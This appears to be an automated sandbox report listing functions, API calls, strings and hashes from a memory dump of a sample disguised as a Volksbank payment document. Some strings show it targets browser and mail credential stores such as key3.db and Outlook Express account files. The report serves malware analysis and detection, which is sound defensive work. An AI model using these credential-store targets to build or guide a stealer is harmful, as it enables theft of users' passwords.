                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                          • API String ID: 231171946-3708268960
                                                                                                                                                                                                                                          • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                                                                          • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                                                                                                                                          Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                          • String ID: winWrite1$winWrite2
                                                                                                                                                                                                                                          • API String ID: 438689982-3457389245
                                                                                                                                                                                                                                          • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                                                          • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                                                                                          Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                                          • String ID: winRead
                                                                                                                                                                                                                                          • API String ID: 1297977491-2759563040
                                                                                                                                                                                                                                          • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                                          • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                                                                          Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                                          • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                                          • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                                                                          Function 0040AB66 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76940A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76940A60), ref: 00406D4D
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                                                                                            • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                                            • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                                            • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                                          • API String ID: 3337535707-2769808009
                                                                                                                                                                                                                                          • Opcode ID: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                                                                                                                                          • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                                                                                          Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                                                                          • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                                          • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                                                                          Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                                                                                            • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                                                                                                            • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                                                                                            • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                                            • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                                            • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                                            • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                                          • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2374668499-0
                                                                                                                                                                                                                                          • Opcode ID: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                                                                                                                                                                          • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                                                                                                                                          Function 0040AD38 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AD5B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AD71
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76940A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76940A60), ref: 00406D4D
                                                                                                                                                                                                                                            • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                                            • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • <%s>, xrefs: 0040ADA2
                                                                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                                          • API String ID: 3699762281-1998499579
                                                                                                                                                                                                                                          • Opcode ID: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                                                                                                                                                                                                                          • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                                                                                                                                                                          Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A3E
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A4C
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A5D
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A74
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A7D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                                          • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                                                                                                                                                          • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                                                                                                                                                          Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A3E
                                                                                                                                                                                                                                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A4C
                                                                                                                                                                                                                                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A5D
                                                                                                                                                                                                                                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A74
                                                                                                                                                                                                                                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A7D
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00409B00
                                                                                                                                                                                                                                            • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2241099983-0
                                                                                                                                                                                                                                          • Opcode ID: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                                                                                                                                                                                                          • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                                                                                                                                                          Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                                                                            • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                                                                            • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2775283111-0
                                                                                                                                                                                                                                          • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                                                                          • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                                                                                                          Function 00405F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                                                                                                                                                                                                            • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                                                                                                                                                                                                            • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                                                                                                                                                                                                            • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                          • API String ID: 2498372239-3993045852
                                                                                                                                                                                                                                          • Opcode ID: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                                                                                                                          • Instruction ID: a7623898fd9bb087a7334f25a668ee6c33d9336bc772a6b4061b4b4824447eab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7317070640259FFEB229B52CC89DAF3E7CEBC5B98F10402DF401792A1CA794F11E669
                                                                                                                                                                                                                                          Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                                                                                                                                                                            • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                                                                                                                                            • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                                                                                                                                                                                            • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                          • String ID: Ul@$key3.db
                                                                                                                                                                                                                                          • API String ID: 1968906679-1563549157
                                                                                                                                                                                                                                          • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                                                                          • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
